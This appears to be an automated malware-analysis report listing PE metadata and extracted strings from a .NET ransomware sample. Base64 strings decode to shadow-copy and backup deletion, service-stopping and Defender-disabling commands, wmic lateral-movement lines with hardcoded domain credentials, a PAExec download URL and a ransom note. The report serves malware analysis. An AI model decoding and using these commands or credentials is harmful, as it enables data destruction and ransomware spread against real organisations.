| "reported_checksum": "0x00000000", | |
| "actual_checksum": "0x0001d9f5", | |
| "osversion": "4.0", | |
| "pdbpath": null, | |
| "imports": {}, | |
| "exported_dll_name": null, | |
| "exports": [], | |
| "dirents": [ | |
| { | |
| "name": "IMAGE_DIRECTORY_ENTRY_EXPORT", | |
| "virtual_address": "0x00000000", | |
| "size": "0x00000000" | |
| }, | |
| { | |
| "name": "IMAGE_DIRECTORY_ENTRY_IMPORT", | |
| "virtual_address": "0x00017e2c", | |
| "size": "0x0000004f" | |
| }, | |
| { | |
| "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE", | |
| "virtual_address": "0x00018000", | |
| "size": "0x00000634" | |
| }, | |
| { | |
| "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION", | |
| "virtual_address": "0x00000000", | |
| "size": "0x00000000" | |
| }, | |
| { | |
| "name": "IMAGE_DIRECTORY_ENTRY_SECURITY", | |
| "virtual_address": "0x00000000", | |
| "size": "0x00000000" | |
| }, | |
| { | |
| "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC", | |
| "virtual_address": "0x00000000", | |
| "size": "0x00000000" | |
| }, | |
| { | |
| "name": "IMAGE_DIRECTORY_ENTRY_DEBUG", | |
| "virtual_address": "0x00000000", | |
| "size": "0x00000000" | |
| }, | |
| { | |
| "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT", | |
| "virtual_address": "0x00000000", | |
| "size": "0x00000000" | |
| }, | |
| { | |
| "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR", | |
| "virtual_address": "0x00000000", | |
| "size": "0x00000000" | |
| }, | |
| { | |
| "name": "IMAGE_DIRECTORY_ENTRY_TLS", | |
| "virtual_address": "0x00000000", | |
| "size": "0x00000000" | |
| }, | |
| { | |
| "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG", | |
| "virtual_address": "0x00000000", | |
| "size": "0x00000000" | |
| }, | |
| { | |
| "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT", | |
| "virtual_address": "0x00000000", | |
| "size": "0x00000000" | |
| }, | |
| { | |
| "name": "IMAGE_DIRECTORY_ENTRY_IAT", | |
| "virtual_address": "0x00002000", | |
| "size": "0x00000008" | |
| }, | |
| { | |
| "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT", | |
| "virtual_address": "0x00000000", | |
| "size": "0x00000000" | |
| }, | |
| { | |
| "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR", | |
| "virtual_address": "0x00002008", | |
| "size": "0x00000048" | |
| }, | |
| { | |
| "name": "IMAGE_DIRECTORY_ENTRY_RESERVED", | |
| "virtual_address": "0x00000000", | |
| "size": "0x00000000" | |
| } | |
| ], | |
| "sections": [ | |
| { | |
| "name": ".text", | |
| "raw_address": "0x00002000", | |
| "virtual_address": "0x00002000", | |
| "virtual_size": "0x00015e84", | |
| "size_of_data": "0x00016000", | |
| "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ", | |
| "characteristics_raw": "0x60000020", | |
| "entropy": "5.42" | |
| }, | |
| { | |
| "name": ".rsrc", | |
| "raw_address": "0x00018000", | |
| "virtual_address": "0x00018000", | |
| "virtual_size": "0x00000634", | |
| "size_of_data": "0x00000800", | |
| "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ", | |
| "characteristics_raw": "0x40000040", | |
| "entropy": "0.03" | |
| }, | |
| { | |
| "name": ".reloc", | |
| "raw_address": "0x0001a000", | |
| "virtual_address": "0x0001a000", | |
| "virtual_size": "0x0000000c", | |
| "size_of_data": "0x00000200", | |
| "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ", | |
| "characteristics_raw": "0x42000040", | |
| "entropy": "0.00" | |
| } | |
| ], | |
| "overlay": { | |
| "offset": "0x00018800", | |
| "size": "0x00000800" | |
| }, | |
| "resources": [], | |
| "versioninfo": [], | |
| "imphash": "", | |
| "timestamp": "2020-07-08 22:24:12", | |
| "icon": null, | |
| "icon_hash": null, | |
| "icon_fuzzy": null, | |
| "icon_dhash": null | |
| }, | |
| "dotnet": { | |
| "typerefs": null, | |
| "assemblyrefs": null, | |
| "assemblyinfo": null, | |
| "customattrs": null | |
| }, | |
| "data": null, | |
| "strings": [ | |
| "1234567890", | |
| "Parallel", | |
| "LegalTrademarks", | |
| "WorkerCrypter", | |
| "FixMBR", | |
| "macAddress", | |
| "FTPAddress", | |
| "bytesToDelete", | |
| "taskkill.exe", | |
| "RijndaelManaged", | |
| "dnNzYWRtaW4uZXhl", | |
| "OpenRead", | |
| "DisableDefender", | |
| "Copyright 2019 3fTddThVDVTaMx4", | |
| "MESSAGERICH", | |
| "TransparentMan", | |
| "get_Item", | |
| "LOGONISOFF", | |
| "UnauthorizedAccessException", | |
| "IsKeySizeValid", | |
| "vmware", | |
| "System.ComponentModel", | |
| "EnumerateFiles", | |
| "cmVzaXplIHNoYWRvd3N0b3JhZ2UgL2Zvcj1lOiAvb249ZTogL21heHNpemU9NDAxTUI=", | |
| "AddressFamily", | |
| "Lengths of IP address and subnet mask do not match.", | |
| "bm90ZXBhZC5leGU=", | |
| "c3RvcCB2ZWVhbSAveQ==", | |
| "Image", | |
| "net.exe", | |
| "dGNwZHVtcA==", | |
| "GetInstances", | |
| "TypeLibFuncAttribute", | |
| "\\C$ /user:Admin Admin", | |
| "ToList", | |
| "L0lNIG1zcHViLmV4ZSAvRg==", | |
| "hProcess", | |
| "ExtensionAttribute", | |
| "set_IV", | |
| "CS$<>9__CachedAnonymousMethodDelegate3", | |
| "ntuser.dat", | |
| "user32.dll", | |
| "c3RvcCBSVFZzY2FuIC95", | |
| "qwe321", | |
| "#GUID", | |
| "UG9zc2libGUgYWZmZWN0ZWQgZmlsZXM6IA==", | |
| "SequenceEqual", | |
| "NtOpenProcess_AsmOpCode", | |
| "uzantilar", | |
| "DelayTime", | |
| "linkName", | |
| "UniqID", | |
| "LVM_DELETECOLUMN", | |
| "Delay", | |
| "iImage", | |
| "GetDirectoryName", | |
| "GetCurrentProcess", | |
| "PtrToStringAnsi", | |
| "gCLianUocZKoeIY", | |
| "rawkey", | |
| "TargetPath", | |
| "ImageFormat", | |
| "QmxvY2tz", | |
| " -d -f -h -s -n 2 -c ", | |
| "ROOT1", | |
| "$$method0x60000d9-1", | |
| "ZGVsLmV4ZQ==", | |
| "\\HOW_TO_DECYPHER_FILES.hta", | |
| "eDMyZGJn", | |
| "Win32Exception", | |
| "GetResponse", | |
| "VIRTUAL", | |
| "ReadMemoryByte", | |
| "accdb", | |
| "wParam", | |
| "cmVzaXplIHNoYWRvd3N0b3JhZ2UgL2Zvcj1oOiAvb249aDogL21heHNpemU9dW5ib3VuZGVk", | |
| "FullName", | |
| "RecursiveFileSearch", | |
| "CryptographyHelper", | |
| "taskList", | |
| "toolLocation", | |
| "AESDecryptBytes", | |
| "MacIpPair", | |
| "_optimalAsymmetricEncryptionPadding", | |
| "MEM_MAPPED", | |
| "<RecursiveReleaseFiles>b__1", | |
| "DirectoryInfo", | |
| "WaitOne", | |
| "sqlitedb", | |
| "c3RvcCBQRFZGU1NlcnZpY2UgL3k=", | |
| "set_WorkingDirectory", | |
| "ftpuser", | |
| "DownloadString", | |
| "bInheritHandle", | |
| "System.Reflection", | |
| "NotifyMe", | |
| "RGF0ZSBvZiBlbmNyeXB0aW9uOiA=", | |
| "filename", | |
| "Anti_Analysis", | |
| "CryptoStreamMode", | |
| "URL=file:///", | |
| "set_Description", | |
| "c3RvcCBBY3JvbmlzQWdlbnQgL3k=", | |
| "ThreadPriority", | |
| "List`1", | |
| "GetBroadcastAddress", | |
| "PROCESS_VM_WRITE", | |
| "SystemParametersInfo", | |
| "crypt_uzantisi", | |
| "myMutex", | |
| "$$method0x6000016-1", | |
| "DeceiveMe", | |
| "get_BinaryLength", | |
| " </requestedPrivileges>", | |
| "ModBaseAddr", | |
| "</assembly>", | |
| "USERNAME", | |
| "destinationFilePath", | |
| "SW50ZXJjZXB0ZXItTkc=", | |
| "StringFileInfo", | |
| "fuWinIni", | |
| "ZfUhRlZoDQQt7VjYzWt1RnVpugt2h6F7VQiyDYS6CO4IhMk1C6siQz4wKpwv2gGGLTYrwuUbDxzCsMHi52zkOgqgVwoYlhEfHy6Nx3ERlRedA1D7hOzArg2pn2VAG6zgtT44Q4uBxi86BMgesq1XrDyl6Rk5iEKpb8tq6JrmdyMIh5naV0RZFcypeT88UzdtYTeCczhj9O431qEAnJjrwuk9KELnLsSoUcuNak7gSsa0i4yyO7VKPv7ntf2Yo4YR6QiY51kCLDYEUtaPPWYNXHYif", | |
| "thumbs.db", | |
| "Enumerator", | |
| "nasuser", | |
| "d2lyZXNoYXJr", | |
| "RandomByteArray", | |
| "IsInRole", | |
| "System.Security.Principal", | |
| "CriticalProcess", | |
| "SkipC", | |
| "SetProcessSecurityDescriptor", | |
| "GetModuleBaseAddress", | |
| "ExpireAfterDateTime", | |
| "FindTaskManager", | |
| "lpBaseAddress", | |
| "PROCESS_ALL_ACCESS", | |
| "111111", | |
| "set_CreateNoWindow", | |
| "GetRandomFileName", | |
| "StructLayoutAttribute", | |
| "ForEach", | |
| "admin123Test123", | |
| "`.rsrc", | |
| "DelayedActivation", | |
| "v4.0.30319", | |
| "UInt32", | |
| "windowTitle", | |
| "ADMINISTRATOR", | |
| "pSecurityDescriptor", | |
| "password", | |
| "dwProcessId", | |
| "CreateEncryptor", | |
| "PAGE_EXECUTE_READ", | |
| "cmVzaXplIHNoYWRvd3N0b3JhZ2UgL2Zvcj1mOiAvb249ZjogL21heHNpemU9dW5ib3VuZGVk", | |
| "op_Equality", | |
| "programdata", | |
| "SystemFiles", | |
| "uAction", | |
| "NtQuerySystemInformation_AsmOpCode", | |
| "/node:", | |
| "SecurityIdentifier", | |
| "ProccntUsage", | |
| "HModule", | |
| "SetValue", | |
| "ToInt32", | |
| "StopHiding", | |
| "CompilerGeneratedAttribute", | |
| "aZnLma0ZpqTthmr", | |
| "FreeExternalMemory", | |
| "TmV0d29ya1RyYWZmaWNWaWV3", | |
| "MatchCollection", | |
| "MEM_FREE", | |
| "__StaticArrayInitTypeSize=405", | |
| "GetPathRoot", | |
| "Y2hyb21lMzIuZXhl", | |
| "c3RvcCBRQkZDU2VydmljZSAveQ==", | |
| "c3RvcCBzb3Bob3MgL3k=", | |
| "c3RvcCBCYWNrdXBFeGVjQWdlbnRBY2NlbGVyYXRvciAveQ==", | |
| "<PrivateImplementationDetails>{10231E92-BCE6-4007-A463-67D77912E754}", | |
| "SpecialFolder", | |
| "IsNullOrEmpty", | |
| "YesItIs", | |
| "op_Inequality", | |
| "Write", | |
| "cmVzaXplIHNoYWRvd3N0b3JhZ2UgL2Zvcj1jOiAvb249YzogL21heHNpemU9NDAxTUI=", | |
| "AESEncryptBytes", | |
| "Translation", | |
| "IamInmortal", | |
| "GetIPInfo", | |
| "get_Hotkey", | |
| "workingDirectory", | |
| "MarshalAsAttribute", | |
| "boot.ini", | |
| "c3RvcCBCYWNrdXBFeGVjQWdlbnRCcm93c2VyIC95", | |
| "ToString", | |
| "passwordBytes", | |
| "get_BlockSize", | |
| "PROCESS_VM_OPERATION", | |
| "System.Security.AccessControl", | |
| "c3RvcCBCYWNrdXBFeGVjVlNTUHJvdmlkZXIgL3k=", | |
| "Select * from Win32_ComputerSystem", | |
| "\\c net use * \\\\", | |
| "handle", | |
| "lpNumberOfBytesWritten", | |
| "GetDirectories", | |
| "NewGuid", | |
| "OutAttribute", | |
| "AESEncryptFile", | |
| "InvokeMember", | |
| "'!(!)!", | |
| "ToBase64String", | |
| "c3RvcCBCTVIgQm9vdCBTZXJ2aWNlIC95", | |
| "c3RvcCBDQVNBRDJEV2ViU3ZjIC95", | |
| "FileVersion", | |
| "get_UTF8", | |
| "VW5pdmVyc2FsX0ZpeGVy", | |
| "DeleteVolumeMountPoint", | |
| "secret", | |
| "c3ZjaHN0LmV4ZQ==", | |
| "<>c__DisplayClass11", | |
| "L2YgL3BpZCA=", | |
| "System.Core", | |
| "cmVzaXplIHNoYWRvd3N0b3JhZ2UgL2Zvcj1mOiAvb249ZjogL21heHNpemU9NDAxTUI=", | |
| "ReleaseLockedFiles", | |
| "<Module>", | |
| "Create", | |
| "https://www.google.com/", | |
| "EndsWith", | |
| "System.Collections", | |
| "LVM_DELETEITEM", | |
| "GetAddressBytes", | |
| "LayoutKind", | |
| "L3MgL2YgL3EgYzpcKi5WSEQgYzpcKi5iYWMgYzpcKi5iYWsgYzpcKi53YmNhdCBjOlwqLmJrZiBjOlxCYWNrdXAqLiogYzpcYmFja3VwKi4qIGM6XCouc2V0IGM6XCoud2luIGM6XCouZHNr", | |
| "plainText", | |
| "GetFileName", | |
| "Drag_Drop", | |
| "c3RvcCBCYWNrdXBFeGVjUlBDU2VydmljZSAveQ==", | |
| "CredActivate", | |
| "DizonList", | |
| "CheckPassword", | |
| "MEM_RESERVE", | |
| "bWVtb3AuZXhl", | |
| "ZmlyZXNoZWVw", | |
| "Admin", | |
| "Thread", | |
| "set_Hotkey", | |
| "LocalMachine", | |
| "<>c__DisplayClassa", | |
| "get_StandardError", | |
| "ReadByte", | |
| "FtpLog", | |
| "DeleteColumn", | |
| "DynamicPass", | |
| "input", | |
| "outputFile", | |
| "MoveFileExW", | |
| "qwerty123", | |
| "ZG5zcHk=", | |
| "lpvParam", | |
| "Q3JlYXRlU2hvcnRjdXQ=", | |
| "System.Threading", | |
| "GenericSecurityDescriptor", | |
| "PAGE_READWRITE", | |
| "MaxSize", | |
| "LVM_FIRST", | |
| "System.Diagnostics", | |
| "IntPtr", | |
| "<getMacByIp>b__0", | |
| "op_Explicit", | |
| "autorun.inf", | |
| "GetProcessSecurityDescriptor", | |
| "processInformationClass", | |
| "MemoryStream", | |
| "GetEven", | |
| "GetBinaryForm", | |
| "AESDecryptFile", | |
| "EncryptedFiles", | |
| "Y29uZmlnIFNRTFdyaXRlciBzdGFydD0gZGlzYWJsZWQ=", | |
| "RunAntiAnalysis", | |
| "Codemeter", | |
| "ProcessWindowStyle", | |
| "System.Drawing.Imaging", | |
| "get_WorkingDirectory", | |
| "GetFilesList", | |
| "FindIndex", | |
| "GetTypeFromProgID", | |
| "Where", | |
| "EncryptedDirs", | |
| "StringCollection", | |
| "AppFilter", | |
| "processHandle", | |
| "ReverseString", | |
| "4.5.0.0", | |
| "get_TotalSize", | |
| "\\Users\\Public\\", | |
| "Task Manager", | |
| "get_Handle", | |
| "System.Drawing", | |
| "FtpWebRequest", | |
| "c3RvcCBDQUFSQ1VwZGF0ZVN2YyAveQ==", | |
| "GetKeyFromEncryptionString", | |
| "VarFileInfo", | |
| "set_Padding", | |
| "WallpaperChanger", | |
| "lpClassName", | |
| "IsAdmin", | |
| "MessageBox", | |
| "GetBytes", | |
| "12345678", | |
| "__StaticArrayInitTypeSize=84", | |
| " <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>", | |
| "UnmanagedType", | |
| "PAGE_EXECUTE", | |
| "advapi32.dll", | |
| "ntuser.dat.log", | |
| "ntuser.ini", | |
| "nSize", | |
| "RuntimeFieldHandle", | |
| "IsProcessOpen", | |
| "GetCurrentProcessId", | |
| "SUVXYXRjaCBQcm9mZXNzaW9uYWw=", | |
| "lpNumberOfBytesRead", | |
| "IconFile=", | |
| "Directory", | |
| "L0lNIG15ZGVza3RvcHFvcy5leGUgL0Y=", | |
| "Exception", | |
| "IPInfo: Error Retrieving 'arp -a' Results", | |
| "get_Bmp", | |
| "#Blob", | |
| "<WorkerCrypter2>b__15", | |
| "get_Current", | |
| "GetTempFileName", | |
| "RGVsZXRlIFNoYWRvd3MgL2FsbCAvcXVpZXQ=", | |
| "IsSmallDisk", | |
| "piece", | |
| "Styler", | |
| "255.255.255.0", | |
| "wmic.exe", | |
| "ProtectMyProcess", | |
| "get_AddressList", | |
| "L3MgL2YgL3EgZTpcKi5WSEQgZTpcKi5iYWMgZTpcKi5iYWsgZTpcKi53YmNhdCBlOlwqLmJrZiBlOlxCYWNrdXAqLiogZTpcYmFja3VwKi4qIGU6XCouc2V0IGU6XCoud2luIGU6XCouZHNr", | |
| "get_Name", | |
| "class", | |
| "get_MachineName", | |
| "set_IsBackground", | |
| "VGFza21ncg==", | |
| "meltList", | |
| "IEnumerator`1", | |
| "NetworkCredential", | |
| "PAGE_NOACCESS", | |
| "SFRUUE5ldHdvcmtTbmlmZmVy", | |
| "get_TargetPath", | |
| "IEnumerator", | |
| "ICredentials", | |
| "xmlKey", | |
| "Jerry", | |
| "WindowsBuiltInRole", | |
| "cmVzaXplIHNoYWRvd3N0b3JhZ2UgL2Zvcj1oOiAvb249aDogL21heHNpemU9NDAxTUI=", | |
| "VGhhbm9z", | |
| "RecursiveReleaseFiles", | |
| "CompanyName", | |
| "RawSecurityDescriptor", | |
| "nLength", | |
| "tVGdzl3UcNXZpNWas9GUc52bpNnclZFduVmcyV3QcN3dvRmbpdFX0Z2bz9mcjlWTcVkUBdFVG90U", | |
| "Procesos", | |
| "description", | |
| "YOkBRITTKNBYLVa qNEQn0mbG2wNoNm", | |
| "ToLowerInvariant", | |
| "$$method0x60000d9-3", | |
| "LVM_GETITEMTEXTA", | |
| "keySize", | |
| "mrimg", | |
| "FlushFinalBlock", | |
| "Client-2", | |
| "<Main>b__5", | |
| "IEnumerable`1", | |
| "ZGU0ZG90", | |
| "flAllocationType", | |
| "RuntimeCompatibilityAttribute", | |
| "User123", | |
| "$$method0x6000015-1", | |
| "Processes", | |
| "ManagementBaseObject", | |
| " <security>", | |
| "Action`1", | |
| "ToUpperInvariant", | |
| "MyStartName", | |
| "Rootkit", | |
| "System.Runtime.InteropServices", | |
| "InfData", | |
| "LVM_SETITEMTEXTA", | |
| "cchTextMax", | |
| "VGhpcyBwcm9ncmFtIHJlcXVpcmVzIE1pY3Jvc29mdCAuTkVUIEZyYW1ld29yayB2LiA0LjgyIG9yIHN1cGVyaW9yIHRvIHJ1biBwcm9wZXJseQ==", | |
| "L0lNIG15ZGVza3RvcHNlcnZpY2UuZXhlIC9G", | |
| " /USER:EDENFIELD\\efadmin P455w0rd", | |
| "Admin123", | |
| "CloseProcessHandle", | |
| "PWWPh5jww0vweJe 4pFhUfFs2GJ1B5U", | |
| "FileDescription", | |
| "RSACryptoServiceProvider", | |
| "set_IPAddress", | |
| "cmVzaXplIHNoYWRvd3N0b3JhZ2UgL2Zvcj1jOiAvb249YzogL21heHNpemU9dW5ib3VuZGVk", | |
| "rdpuser", | |
| "L3MgL2YgL3EgaDpcKi5WSEQgaDpcKi5iYWMgaDpcKi5iYWsgaDpcKi53YmNhdCBoOlwqLmJrZiBoOlxCYWNrdXAqLiogaDpcYmFja3VwKi4qIGg6XCouc2V0IGg6XCoud2luIGg6XCouZHNr", | |
| "MutexHelper", | |
| "get_ASCII", | |
| "_MachineName=", | |
| "Y29uZmlnIFNRTFRFTEVNRVRSWSRFQ1dEQjIgc3RhcnQ9IGRpc2FibGVk", | |
| "Y3Jjc3MuZXhl", | |
| "Persistence", | |
| "GuidAttribute", | |
| "get_MainModule", | |
| "CreateSubKey", | |
| "ZG5zcHkteDg2", | |
| "FromBase64String", | |
| "<IPAddress>k__BackingField", | |
| "appShortcutToSartUp", | |
| "CopyTo", | |
| "PAGE_WRITECOPY", | |
| "ToLower", | |
| "c3RvcCBCYWNrdXBFeGVjRGl2ZWNpTWVkaWFTZXJ2aWNlIC95", | |
| "Object", | |
| "GetWindowThreadProcessId", | |
| "fileName", | |
| "<>c__DisplayClasse", | |
| "UTF-8", | |
| "Maximum data length is {0}", | |
| "NtQuerySystemInformation", | |
| "InternalName", | |
| "Client-2.exe", | |
| "FileMode", | |
| ".part", | |
| "childAfter", | |
| "nasadmin", | |
| "pszText", | |
| "Format", | |
| "lpWindowName", | |
| "AsymmetricAlgorithm", | |
| "operator", | |
| "TWVnYUR1bXBlcg==", | |
| "VW5Db25mdXNlckV4", | |
| "files_", | |
| "lanList", | |
| "AceQualifier", | |
| "PartialSize", | |
| "\\\\.\\Resolve", | |
| "Killproc", | |
| ".ctor", | |
| "EnterDebugMode", | |
| "WriteProcessMemory", | |
| "BindingFlags", | |
| "v.txt", | |
| "MacAddress", | |
| "InsertAce", | |
| "DoneExtensions", | |
| "GetItemCount", | |
| "c3RvcCBBY3JTY2gyU3ZjIC95", | |
| "encryptedFilePath", | |
| "ProcessAll", | |
| "get_Size", | |
| "PC9wPg==", | |
| "c3RvcCB6aHVkb25nZmFuZ3l1IC95", | |
| "get_Length", | |
| "GetString", | |
| "d2lyZXNoYXJrIHBvcnRhYmxl", | |
| "PrepareToRipIt", | |
| "c3RvcCBRQklEUFNlcnZpY2UgL3k=", | |
| "c3RvcCBWZWVhbVRyYW5zcG9ydFN2YyAveQ==", | |
| "Q0ZGIEV4cGxvcmVy", | |
| "@.reloc", | |
| "get_StackTrace", | |
| "ToArray", | |
| "ManagementObject", | |
| "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", | |
| "get_Status", | |
| "77777", | |
| "Hotkey", | |
| "command", | |
| "ManagementObjectEnumerator", | |
| "(?<ip>([0-9]{1,3}\\.?){4})\\s*(?<mac>([a-f0-9]{2}-?){6})", | |
| "SysListView32", | |
| "cGUtc2lldmU=", | |
| "MEM_PRIVATE", | |
| "IPInfo", | |
| "CleanMyStuff", | |
| "FailFast", | |
| "CloseHandle", | |
| "get_DiscretionaryAcl", | |
| "$$method0x6000066-1", | |
| "12345", | |
| "Crypt", | |
| "DeleteItem", | |
| "StandardModuleAttribute", | |
| "lpBuffer", | |
| "System", | |
| "VeryBasicMode", | |
| "CheckMutex", | |
| "123456789", | |
| "PasswordBytes", | |
| "DialogResult", | |
| "TextReader", | |
| "GetHostEntry", | |
| "adminTest", | |
| "bootmgr", | |
| "ReleaseAllFiles", | |
| "get_StartInfo", | |
| "rdpadmin", | |
| "Administrator123", | |
| "DetectDebugger", | |
| "ZmlkZGxlcg==", | |
| "System.Runtime.CompilerServices", | |
| "op_GreaterThan", | |
| "WriteLine", | |
| "Microsoft.VisualBasic", | |
| "<GetIPInfo>b__0", | |
| "delete", | |
| "AceFlags", | |
| "ToInt16", | |
| "c3RvcCBNY0FmZWVETFBBZ2VudFNlcnZpY2UgL3k=", | |
| "qwerty", | |
| "user-1", | |
| "FindWindow", | |
| "WellKnownSidType", | |
| "Empty", | |
| "NetworkSpreading", | |
| "WindowStyle", | |
| "proc_exe", | |
| "ManagementPath", | |
| "StructureToPtr", | |
| "Dispose", | |
| "ToCharArray", | |
| "set_Position", | |
| "[auto]", | |
| "flNewProtect", | |
| "Key is null or empty", | |
| "FreeHGlobal", | |
| "NtOpenProcess", | |
| "Double", | |
| " /user:EDENFIELD\\efadmin /password:P455w0rd process call create cmd.exe /c \\\\", | |
| "aWxzcHk=", | |
| "strModule", | |
| "WakeOnLan", | |
| "DeleteValue", | |
| "PHAgc3R5bGU9InRleHQtYWxpZ246IGNlbnRlcjsiPktleSBJZGVudGlmaWVyOiA=", | |
| "RawAcl", | |
| "c3RvcCBCYWNrdXBFeGVjTWFuYWdlbWVudFNlcnZpY2UgL3k=", | |
| "ProductName", | |
| "GetHostName", | |
| "RunPS", | |
| "GenerateKey", | |
| "OpenProcessHandle", | |
| "count", | |
| "<>c__DisplayClass6", | |
| "WindowsIdentity", | |
| "BlockProcess", | |
| "GetExecutingAssembly", | |
| "U2t5cGVBcHAuZXhl", | |
| "SbieDll.dll", | |
| "AwakeMe", | |
| "StaticLooks", | |
| "extension", | |
| "ManagementObjectCollection", | |
| "GetEnumerator", | |
| "SetKernelObjectSecurity", | |
| "getMacByIp", | |
| "ClosingCycle", | |
| "WriteToFile", | |
| "HOW_TO_DECYPHER_FILES", | |
| "get_AddressFamily", | |
| "m_type", | |
| "RichText", | |
| "SetLength", | |
| "Blocks", | |
| "set_MacAddress", | |
| "extensions", | |
| "TraverseTree", | |
| "LegalCopyright", | |
| "<>c__DisplayClass1", | |
| "lpnLengthNeeded", | |
| "GetLocalNetwork", | |
| "Handle", | |
| "WorkerCrypter2", | |
| " <assemblyIdentity version=\"1.0.0.0\" name=\"MyApplication.app\"/>", | |
| "get_ProcessName", | |
| "set_WindowStyle", | |
| "docPath", | |
| "index", | |
| "U2V0LU1wUHJlZmVyZW5jZSAtRW5hYmxlQ29udHJvbGxlZEZvbGRlckFjY2VzcyBEaXNhYmxlZA==", | |
| "IPInfo: Error Parsing 'arp -a' results", | |
| "RipIt", | |
| "eW91ciBmaWxlcywgZG9jdW1lbnRzLCBhbmQgYWxsIG9mIHlvdXIgbmV0d29yayBlbmNyeXB0ZWQuDQphbGwgYmFja3VwIGRyaXZlIGFuZCB0YXBlIGRlbGV0ZWQgb2YgZm9ybWF0dGVkLg0KYWxsIHNoYWRvdyBjb3BpZXMgZGVsZXRlZC4NCj09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PQ0KRE9OVCBSRVNUQVJUIFBDDQpET05UIFRPVUNIIE9SIEVESVQgTE9DS0VEIEZJTEVTDQpET05UIFVTRSBSRUdVTEFSIFJFQ09WRVJZIFNPRlRXQVJFLCBFVkVOICJNSUNST1NPRlQgUkVDT1ZFUlkgVE9PTCINCg0KQUxMIE9GIFRIT1NFIE5PVEVTIFdJTEwgQ0FVU0UgWU9VIExPU1QgWU9VUiBGSUxFUyBGT1IgRVZFUg0KPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PQ0KaW1wb3J0YW50IGZpbGVzLCBkb2N1bWVudHMgYW5kIGV0YyBkb3dubG9hZGVkLCBhZnRlciBwdXJjaGFzZSB0aW1lIGlmIHlvdSBkb250IHBheSwgd2Ugd2lsbCBsZWFrIHRoZW0NCj09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0NCmNvbnRhY3QgOiAwMDEwMDIwMDNAc2VjbWFpbC5wcm8=", | |
| "GetDrives", | |
| "Y29uZmlnIFNRTFRFTEVNRVRSWSBzdGFydD0gZGlzYWJsZWQ=", | |
| "offset", | |
| "op_LessThan", | |
| "ProcessStartInfo", | |
| "<RecursiveReleaseFiles>b__0", | |
| "set_BlockSize", | |
| "InvalidOperationException", | |
| "superuser", | |
| "CurrentUser", | |
| "Ctrl+Shift+X", | |
| "/c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin", | |
| "use \\\\", | |
| "SpreadOverNetwork", | |
| "Module32First", | |
| "win32_logicaldisk.deviceid=\"", | |
| "UserName=", | |
| "dwFlags", | |
| "mykey", | |
| "Worker", | |
| "Description", | |
| "guest", | |
| "Encoding", | |
| "publicKeyXml", | |
| "WriteByte", | |
| "array2", | |
| "filePath", | |
| "SendB", | |
| "Combine", | |
| "Manufacturer", | |
| "<Encrypt2>b__19", | |
| "System.Net", | |
| "Y29uZmlnIFNzdHBTdmMgc3RhcnQ9IGRpc2FibGVk", | |
| "set_UseShellExecute", | |
| ".cctor", | |
| "aHR0cHM6Ly93d3cucG93ZXJhZG1pbi5jb20vcGFleGVjL3BhZXhlYy5leGU=", | |
| "ProcessCompareProductName", | |
| "CS$<>9__CachedAnonymousMethodDelegate9", | |
| "ManagementObjectSearcher", | |
| "Wallpaper", | |
| "StreamReader", | |
| "CreateDecryptor", | |
| "result", | |
| "Compare", | |
| "m_shell", | |
| "domeall", | |
| "PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD", | |
| "wallpaper.bmp", | |
| "DumpFilter", | |
| "GetCurrent", | |
| "MoveNext", | |
| "#32770", | |
| "RIPmeBiot", | |
| "UEVpRA==", | |
| "TG9yZFBF", | |
| "Random", | |
| "GetTempPath", | |
| "c3RvcCBWU05BUFZTUyAveQ==", | |
| "extstyl", | |
| "RegexOptions", | |
| "UkRHIFBhY2tlciBEZXRlY3Rvcg==", | |
| "AppendAllText", | |
| "MidpointRounding", | |
| "GetItemText", | |
| "stream", | |
| "IPHostEntry", | |
| "set_ContentLength", | |
| "FindWindowEx", | |
| "SniffersKiller", | |
| "$$method0x60000d9-2", | |
| "ZWZmZXRlY2ggaHR0cCBzbmlmZmVy", | |
| "parentHandle", | |
| "Select", | |
| "other user", | |
| "VirtualAllocEx", | |
| "ZHVtcGNhcA==", | |
| "eDY0ZGJn", | |
| "get_Location", | |
| "names", | |
| "enable", | |
| "<Killproc>b__6", | |
| "GenericAce", | |
| "c3RvcCBhdnBzdXMgL3k=", | |
| "WorkingDirectory", | |
| "get_KeySize", | |
| " /user:EDENFIELD\\efadmin /password:P455w0rd process call create cmd.exe /c \\", | |
| "Encrypt2", | |
| "Module32Next", | |
| "TaskManagerWindow", | |
| "Marshal", | |
| "dGFza21ncg==", | |
| "GetARPResult", | |
| "Incorrect MAC address supplied!", | |
| "MapDrv", | |
| "Sleep", | |
| "WaitForProcess", | |
| "uParam", | |
